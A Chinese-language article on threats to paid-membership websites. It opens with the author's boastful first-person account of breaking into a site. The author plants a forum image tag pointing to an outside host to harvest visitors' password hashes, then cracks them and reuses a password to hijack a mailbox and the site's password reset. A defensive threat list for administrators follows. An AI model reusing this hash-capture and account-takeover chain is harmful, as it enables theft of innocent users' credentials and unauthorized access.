I、前言
经过这几年网络泡沫的洗礼,各大网站也慢慢地成长起来了。人们也渐渐地懂得了一个道理,天下没有免费的午餐,所以,网络上免费的东西越来越少。收费邮箱、收费空间、收费域名等等各种各样的服务也都明码标价,甚至看个电影,下载个软件,也变成了付费会员才可以享受的权利。虽然很多人都非常地不适应,但是趋势是不可阻挡的,网络也渐渐的规范起来。
不过,因为收费网站里面总有着吸引人的东西,所以有人不想接受这个现实(比如我,呵呵),总想通过其他不正常的手段,比如利用网站或者管理员配置上的漏洞来获取无法免费得到的服务。
II、一次入侵实例
前段时间,工作的原因,需要得到一些资料,Google了半天,总算找到一个提供下载的网站。可是,我郁闷地发现,资料被放在会员区,想下载,先交钱。唉,找了一上午了,总不能空手而归吧,于是,决定试试,能不能搞到个密码,得到我所需要的资料。
先做了前期踩点工作,从80的banner看来是windows2000的机器,用的是IIS5,其他的一点信息都没有,猜测应该是有防火墙或者路由器,禁止了从外面发起的连接,所以,除了80端口,其他的什么也得不到。没办法,只能从网页上下手了。
重新浏览了一下web页面,会员区需要输入口令才可以进入,还提供了一个论坛来交流。进论坛转了一圈,是动网的论坛,在线会员还挺多的。呵呵,看来,得从论坛下手了。等待无辜的人们上当了,阿门。
首先在贴图区发了篇帖子,粘上了5张美女的照片,然后,用upload语句来做点手脚,
[u p l o a d = b m p ] file:// **.**.**.**/test.bmp[ / u p l o a d ]
呵呵,看出来了吧,我要用会话劫持HASH了。然后,开嗅探器,准备抓HASH吧。哈哈,果然有上当的,还有不少色色的朋友在后面跟贴,却不知道他的系统口令已经到我手上了,嘿嘿。导入LC4,跑出来几个简单的口令。不过,这些口令跟会员区的登陆口令并不相同,还要继续做工作,唉。
突然,我想到他们的邮箱,会不会邮箱跟系统口令是一样的。从论坛的资料中得到了他们的邮箱,一个个测试。果然,哈哈,运气来了挡都挡不住,一个人的新浪的邮箱成功得到了。现在又有进步了,可是还没有得到我想要的。继续在网站上逛逛,看看还有什么可利用的。慢慢地,我把眼睛放在了会员区忘记密码这个连接上,呵呵,可以用我控制的邮箱来取回密码啊,哈哈,我怎么那么聪明,.^_^. 剩下的就不用说了,成功取得会员区密码,然后清楚痕迹,获得我想要的资料。
前面的过程也勉强算是一次成功的渗透入侵吧。首先利用动网论坛允许贴图的方法,获取会员的系统口令,利用邮箱口令跟系统口令相同的运气,成功利用取回密码的功能,得到会员资格。
III、当前遇到的威胁
想想自己也帮朋友管理过收费网站,自己也曾通过入侵获得过免费的服务。下面就用我的一点经验来谈谈当前收费网站遇到的威胁。
首先从入侵者角度:
1、层出不穷的系统漏洞给了入侵者无数的机会,特别是有足够能力发现新漏洞的黑客,完全有机会利用未知漏洞入侵成功。
举个例子,前段时间才公布的webdav溢出漏洞,就是这样的情况。webdav是IIS的一个组件,默认安装的情况下有溢出的漏洞。微软在2003年3月份公布这个漏洞,漏洞级别被定为严重级。而据我所知,早在去年的下半年,国内的黑客已经写出了溢出利用程序,对IIS5通杀,可以获得system权限的shell。不要说国内了,就是美国的大量WEB服务器都统统存在这个漏洞。而微软也是因为美国军方的一个服务器被入侵,才发现这个漏洞,紧急给出补丁的。所以,这个威胁是非常大的,特别是对收费网站,我曾亲眼看到朋友用这个漏洞进入一台主页空间提供商的机器,获取超级用户权限,替换掉了目标主页。这个事情在CSDN上面的网络安全版混过的朋友都应该有印象。这个时候,漏洞才公开两天。不过,话说回来,利用未知漏洞入侵的威胁虽然最大,但是因为这样的高手少之又少,并且高手也不屑于做这个,等大家都知道了漏洞利用方法,微软也早就推出补丁了。
威胁一:未知漏洞入侵 威胁程度:极高 发生几率:极低
2、越来越多的傻瓜型黑客工具的出现,让入门的门槛越来越低,也是收费网站最常见的威胁。
流光、X-scan等扫描工具的出现,虽然说是中国黑客水平的体现,但是也大大地降低了入门的门槛。没有任何网络知识的人,只要拿到这种工具随便扫扫,就能自称为黑客。近来突然发现一个跟傻瓜型的工具,好象叫windows自动攻击机,扫到有漏洞机器后,什么都不用你做,就可以自动完成提升权限,添加用户的功能,我faint。网站管理员看到那扫描器留下的成堆成堆的日志记录,真是哭笑不得。
而溢出工具也只需要你填上ip地址,就可以等着system的shell了,比如printer溢出、ida溢出、webdav溢出,溢出程序都有高人做好了,只要拿来主义就可以了。
工具带来的威胁对网站是切切实实存在的,网站管理员每天碰到最多的就是这种,不过,由于入侵者利用的都是已经公布很久的漏洞,或者是网管非常大意的失误,所以只要做好基本的防范,打好补丁,就可以轻松防止入侵。
威胁二:傻瓜型工具 威胁程度:低 发生几率:高
3、入侵者入侵不成的报复攻击,比如拒绝服务攻击,等等。
有些攻击者入侵不成,反出现报复心理,或者是同行,因为竞争关系,导致拒绝服务攻击。这种攻击也非常常见,是最令网站管理员头疼的。网站无法提供正常服务,造成很大损失,并且还非常难找出入侵者。
威胁三:拒绝服务攻击 威胁程度:中 发生几率:中
现在从网站管理员角度:
作为一个网站管理员,当然希望自己保护的网站能够正常运转,但不时出现的入侵者总是威胁着自己。
1、付费用户密码的威胁。
付费用户在享受服务之前,管理员会分配给他一个密码,这个密码就是入侵者最想得到的,所以,密码的强度是首先要考虑的。有的为了方便用户,还开放了修改密码的功能,虽然这有利于用户,但是也给入侵者以可趁之机。如果付费用户的保密意识差,设定一个简单密码,而被入侵者轻易得到的话。入侵者就会享受到收费用户才有的服务。
威胁四:用户密码管理 威胁程度:中 发生几率:中
2、用户身份验证的威胁。
这一点刚写文章时我并没有想到,是跟小叮当朋友聊天的时候得到的提示。如果管理员用windows集成验证来验证收费用户身份的话,那系统中就会出现不断添加的用户,这些即时生成的新加账号产生了不小的威胁。因为用户本身就是系统用户,所以入侵者一旦有了一个用户的密码,就会想方设法提高权限,直到取得管理员权限。
威胁五:用户身份验证 威胁程度:高 发生几率:中
3、管理员的安全意识
其实前面的所有威胁都比不上管理员安全意识的威胁大。一个出色的管理员,能够杜绝未知攻击的发生,能够及时发现存在的漏洞,能够对服务器出现的任何异常做出合理的判断。而一个安全意识薄弱的管理员,根本不会注意可能出现的入侵,甚至都被入侵成功后还无动于衷。
威胁六:管理员安全意识 威胁程度:极高 发生几率:低
IV、尾声
因为收费网站提供的服务是需要付出代价的,并且非常吸引人,所以,才会有那么多人想打这些网站的主意。希望本文能够给朋友们一点帮助,保护好自己的网站,给真正的付费会员提供更好的服务。